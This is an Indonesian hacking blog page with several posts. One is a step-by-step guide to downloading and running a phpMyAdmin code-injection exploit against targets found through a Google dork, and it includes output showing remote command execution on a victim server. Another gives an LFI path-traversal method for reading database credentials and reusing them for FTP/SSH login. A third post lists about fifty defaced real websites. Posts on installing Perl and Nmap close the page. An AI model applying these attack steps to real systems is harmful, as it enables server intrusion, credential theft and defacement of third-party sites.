PhpMyAdmin injection code

Posted on 17.00 by CS-31

ini semua setelahh habis maen-maen forum di xcode.or.id
eh nemu yang beginian
ingin hati ingin mencobanya heheheheheh
tapi ane masih pakek windows jadi share dulu aja

hehehe
semoga bermanfaat

1. Download exploit nya di milw0rm
Code:
http://milw0rm.com/exploits/download/8921

2. setelah di download ubah permission file yang dengan cara :
Code:
chmod 755 nama_file.sh

3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl

4. googling :
Code:
inurl:phpmyadmin

5. contoh nya :
Code:
wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://*********.*****.**//config/config.inc.php?c=ls+-l+/
http://***************//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentestergmail.com


dan hasilnya :
Code:
total 112
drwxr-xr-x 2 root root 4096 Mar 11 06:47 bin
drwxr-xr-x 3 root root 4096 Apr 16 07:24 boot
lrwxrwxrwx 1 root root 11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x 13 root root 13840 May 31 08:21 dev
drwxr-xr-x 96 root root 4096 Jun 11 06:44 etc
drwxr-xr-x 5 root root 4096 May 4 13:49 home
lrwxrwxrwx 1 root root 32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx 1 root root 31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x 13 root root 12288 Apr 16 07:23 lib
drwx------ 2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x 3 root root 4096 Feb 19 20:07 media
drwxr-xr-x 14 root root 4096 May 18 22:39 mnt
drwxr-xr-x 2 root root 4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root 0 May 31 08:21 proc
drwxr-xr-x 9 root root 4096 May 19 14:47 root
drwxr-xr-x 2 root root 4096 Apr 16 07:23 sbin
-rw------- 1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x 2 root root 4096 Feb 19 20:08 srv
drwxr-xr-x 12 root root 0 May 31 08:21 sys
drwxrwxrwt 5 root root 4096 Jun 14 05:32 tmp
drwxr-xr-x 11 root root 4096 Feb 19 20:14 usr
drwxr-xr-x 15 root root 4096 Feb 19 20:26 var
lrwxrwxrwx 1 root root 29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx 1 root root 28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server


ok dehhh sekian dulu ya :D

thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain :D
salam PsyChotr0n

From : Xcode

pengen jelas monggo berkunjung
http://forum.xcode.or.id

HACKED BY SOA

Posted on 21.10 by CS-31



http://dishnetworkvscable.com/wp-content/themes/default/
http://eulogyforafriend.org/
http://howtowriteaeulogy.net/http://iplonline.info/
http://www.giwcb.com/wp-content/themes/newsportal/
http://abetterlifeachieved.com/
http://brandongoodin.com/
http://cheap-iphone.info/
http://cheap-iphone.info/
http://prestamosycredito.com/wp-content/themes/BlueSense/404.php
http://jli.cc/
http://mysmallbusinessphones.com/
http://swimmingpoolheatpumps.net/wp-content/themes/librio/
http://www.zebraprintshoes.net/
http://www.hamiltonbeachjuicer.com/
http://www.windnettop.com/
http://www.lightfixturesbathroom.org/
http://www.bistropatiofurniture.org/
http://www.outdoorbistrosets.org/
http://www.bluetoothbarcodescanner.net/
http://www.bathshowercurtain.org/
http://www.aquabotpoolcleaners.org/
http://www.championsportsbras.org/
http://www.bambooromanshades.org/
http://www.acuvueoasyscontacts.org/
http://www.rubbermaidstorageshed.net/
http://www.athletic-bras.com/
http://www.leopardprintshoes.org/
http://ict.co.tt/soa.html
http://antiguastay.com/soa.php
http://www.jacklalannespowerjuicer.org/
http://thesamoans.com/
http://www.learninghindi.org/
http://caribbeanprime.com/
http://www.searchantigua.com/404.php
http://officezen.net/soa.php
http://www.mirabaicentro.com/help/ces.html
http://2024mb.com/~taokecn/home/ces.html
http://biorresonancia.com/
http://killing-lice.com/
http://heatherdoram.com/404.php
http://searchstkitts.com/
http://searchstvincent.com/
http://intellectmediagroup.com/
http://demo.twib.co.cc/
http://2gbddr.com/
http://goodpickuplinesforgirls.com/
http://whichlaptoptobuy.com/
http://maleblowupdoll.net/wp-content/themes/flexibility2/404.php
http://calstatetrust.com/wp-content//themes/default/
http://natural-hemorrhoid-treatment.info/

miror
http://zone-h.org/archive/defacer=CYBER

Tutorial mendapatkan SSHcpanel Login

Posted on 20.30 by CS-31

Ini aku dapet setelah aku jalan-jalan kesana kemari akhirnya dapet cuman
aku dapetnya pakek windows,

nah sekarang ane akan nyobak dengan pakek linux.
intinya sih sama aja yaa hanya perbedaan dari taraf kerjanya :D
langsung aja yaaaa

ada beberapa tool yang digunakan untuk mendapatkan login ssh, cpn
Salah satunya "ConfigSpy", namun untuk menggunakan tool ini anda sudah harus berada dalam system/host target.

kita coba yang lain hehehe monggoo

http://[site]/[path]/xx.php?file=[LFI]

nah ini merupakan cara untuk web bug dari LFI

Sebelum menggunakan, kita harus tau aplikasi apa yang digunakan oleh we tersebut. Maksud saya di sini adalah kita mencari tau dahulu path atau lokasi dimana file config yang mengatur koneksi ke database. Mengapa?? Seperti yang dilakukan oleh "ConfigSpy", yaitu mengambil login database untuk mencoba login ke ftp.

Seperti yang kalian tau bahwa sering terjadi kecerobohan dalam memberi login database, dimana login tersebut sama dengan login ke ftp maupun ssh.

Nah ...
Pada ada aplikasi cms, path config nya terdapat pada pathnya...

URL dari exploit nya menjadi seperti ini (DEMO):

http://site/plugins/my_images/image.php?file=../../config.php

../../ <------- mundur folder sebanyak 2x dari lokasi awal. Content yang kita dapatkan adalah: ........ cut ...................... $mySQLuser = 'guejelek'; $mySQLpassword = 'guehaho'; ........ cut ...................... Kalo sudah dapat seperti itu silahkan di coba login ke ftp/ssh :) Kalo gagal berarti login nya tidak sama. Coba terus, tetap semangat -_- uUtuk bug cms ini telah ada exploit untuk mempermudah dan menghemat tenaga. Silahkan download di sini.

Cara penggunaannya (linux):
lebih dahulu install perl dulu yang tutornya ada di bawah
kemudian ke console ketik

root@ubuntul:~ file.pl 'target'

[~] Exploiting http://terget.com/ ...
[~] DB Username: guejelek
[~] DB Password: guehaho

Tips ini berlaku untuk aplikasi yg memiliki Bug LFI/LFD.
Silahkan edit exploit nya sesuai dengan kebutuhan

Selamat Mencoba deh :D

thanks for C0li, Vycod, cak Surep, IHT, MCC, all My friends

heheh ini aku dapet setelah aku pengen mengexploit web tapi source codenya musti pakek perl

jadi musti instal dulu karena linuxku baru

jadi pertama-tama update ubuntunya dulu, consolenya:

sudo apt-get update

abis itu baru dah kita download perlnya dengan cara

sudo apt-get install perl

insyaallah dapet :D

terus gimana cara menggunakan

pertama kamu

program perl biasanya berada di

usr/bin/perl

cara menggunakan, pertama ketik

chmod +x file.pl
./file.pl


mka akan jalan deh :D

selamat mencoba yaaa

Instal Nmap Di ubuntu

Posted on 19.28 by CS-31

Kali ini saya akan menjelaskan bagaimana menginstal Nmap di ubuntu

pertama yang musti dilakukan adalah kita masuk terminal linux ubuntu

setelah masuk kita harus jadi rootnya, caranya ketik:

sudo -i

setelah menjadi root
kemudian ketik :

apt-get install nmap

untuk mendownload dan menginstal nmap

setelah itu kalo kita ingin mengscan target
consol yang digunakan adalah
========================================
nmap -v -a "target domain"
nmap -v -sp "ip addres range"
nmap -v -ir port open -pn port yang digunakan
=======================================
contoh
nmap -v -a google.com
nmap -v -sp 193.168.0.1/16 10.0.0.0/8
nmap -v -ir 10000 -pn 80